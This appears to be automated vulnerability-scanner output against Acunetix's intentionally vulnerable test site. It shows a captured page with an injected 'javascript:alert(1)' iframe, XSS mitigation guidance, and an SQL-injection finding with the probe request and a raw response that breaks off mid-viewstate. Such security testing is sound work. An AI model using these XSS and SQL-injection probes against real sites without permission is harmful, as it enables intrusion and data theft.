</TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter NewsAdAttack javascript:alert(1);Evidence javascript:alert(1);Solution フェーズ: アーキテクチャと設計
同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
-
SQL Injection (2)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2
Alert tags Alert description SQL injection may be possible.
Other info The original page results were successfully replicated using the expression [4-2] as the parameter value
The parameter value being modified was stripped from the HTML output for the purposes of the comparison
Request Request line and header section (343 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232 Content-Length: 0Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:08:37 GMT Content-Length: 39227Response body (39227 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=4-2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBayAmYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIH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